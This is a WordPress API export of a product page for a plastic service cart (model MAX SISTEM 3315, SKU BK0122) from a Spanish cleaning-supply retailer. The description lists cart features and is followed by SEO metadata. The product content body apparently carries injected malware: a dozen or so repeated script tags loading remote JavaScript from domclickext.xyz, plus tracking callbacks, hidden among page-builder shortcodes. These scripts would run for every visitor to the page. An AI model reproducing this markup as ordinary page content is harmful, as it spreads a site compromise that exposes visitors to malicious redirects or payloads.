{"id":10862,"date":"2019-10-21T12:02:49","date_gmt":"2019-10-21T11:02:49","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=10862"},"modified":"2019-10-30T12:51:31","modified_gmt":"2019-10-30T12:51:31","slug":"modelo-max-sistem-3315-codigo-bk0122","status":"publish","type":"product","link":"https:\/\/meprolim.es\/en\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas-en\/carros-recogida-transporte-en\/modelo-max-sistem-3315-codigo-bk0122\/","title":{"rendered":"MODELO MAX SISTEM 3315 &#8211; C\u00d3DIGO BK0122"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Soluci\u00f3n eficiente para maximizar el espacio, el transporte y el almacenamiento. Fabricados en pl\u00e1stico estructural resistente a los impactos, manchas y corrosi\u00f3n.<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_931216335&amp;key=212b3d4039ab5319ec&amp;cv=1570105258&amp;t=1570105258209\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_620849238&amp;key=212b3d4039ab5319ec&amp;cv=314958&amp;t=1570105258209\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_378493938&amp;key=212b3d4039ab5319ec&amp;cv=1570105299&amp;t=1570105299284\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_504834549&amp;key=212b3d4039ab5319ec&amp;cv=314999&amp;t=1570105299285\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<ul>\n<li>Dispone en su parte superior de una tabla de corte para manipular alimentos.<\/li>\n<li>\u00a0Carro de preparaci\u00f3n de carga lateral.<\/li>\n<li>Abertura: 33 cm.<\/li>\n<li>Aplicaciones: 8 ranuras.<\/li>\n<li>Con bordes lisos y redondeados para proteger paredes, puertas y muebles en su desplazamiento.<\/li>\n<li>\u00datil en salas refrigeradas.<\/li>\n<li>Su dise\u00f1o permite trabajar con ellos tanto en cocina como en comedor.<\/li>\n<li>F\u00e1ciles de limpiar.<\/li>\n<li>Certificaci\u00f3n NSF en materia de limpieza.<\/li>\n<li>Cuatro ruedas giratorias anti huellas de \u00d8 127 mm, dos con bloqueo.<\/li>\n<li>Opcionalmente las ruedas pueden ser de caucho.<\/li>\n<\/ul>\n<p><strong>SKU: BK0122<\/strong><\/p>\n","protected":false},"featured_media":10863,"template":"","meta":[],"product_brand":[],"product_cat":[102,233,1099],"product_tag":[],"class_list":{"0":"post-10862","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","7":"product_cat-carros-recogida-transporte","8":"product_cat-carros-carretillas","10":"first","11":"instock","12":"shipping-taxable","13":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"Dispone en su parte superior de una tabla de corte para manipular alimentos.  \u00a0Carro de preparaci\u00f3n de carga lateral.  Abertura: 33 cm.  Aplicaciones: 8 ranuras.  Con bordes lisos y redondeados para proteger paredes, puertas y muebles en su desplazamiento.  \u00datil en salas refrigeradas.  Su dise\u00f1o permite trabajar con ellos tanto en cocina como en comedor.  F\u00e1ciles de limpiar.  Certificaci\u00f3n NSF en materia de limpieza.  Cuatro ruedas giratorias anti huellas de \u00d8 127 mm, dos con bloqueo.  Opcionalmente las ruedas pueden ser de caucho.  SKU: BK0122\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T12:51:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/BK0122.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/\",\"name\":\"MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/BK0122.jpg\",\"datePublished\":\"2019-10-21T11:02:49+00:00\",\"dateModified\":\"2019-10-30T12:51:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/BK0122.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/10\\\/BK0122.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-recogida-transporte\\\/modelo-max-sistem-3315-codigo-bk0122\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"MODELO MAX SISTEM 3315 &#8211; C\u00d3DIGO BK0122\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/","og_locale":"en_US","og_type":"article","og_title":"MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim","og_description":"Dispone en su parte superior de una tabla de corte para manipular alimentos.  \u00a0Carro de preparaci\u00f3n de carga lateral.  Abertura: 33 cm.  Aplicaciones: 8 ranuras.  Con bordes lisos y redondeados para proteger paredes, puertas y muebles en su desplazamiento.  \u00datil en salas refrigeradas.  Su dise\u00f1o permite trabajar con ellos tanto en cocina como en comedor.  F\u00e1ciles de limpiar.  Certificaci\u00f3n NSF en materia de limpieza.  Cuatro ruedas giratorias anti huellas de \u00d8 127 mm, dos con bloqueo.  Opcionalmente las ruedas pueden ser de caucho.  SKU: BK0122","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T12:51:31+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/BK0122.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/","name":"MODELO MAX SISTEM 3315 - C\u00d3DIGO BK0122 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/BK0122.jpg","datePublished":"2019-10-21T11:02:49+00:00","dateModified":"2019-10-30T12:51:31+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/BK0122.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/10\/BK0122.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-recogida-transporte\/modelo-max-sistem-3315-codigo-bk0122\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/en\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/en\/catalogue\/"},{"@type":"ListItem","position":3,"name":"MODELO MAX SISTEM 3315 &#8211; C\u00d3DIGO BK0122"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product\/10862","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media\/10863"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media?parent=10862"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_brand?post=10862"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_cat?post=10862"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_tag?post=10862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}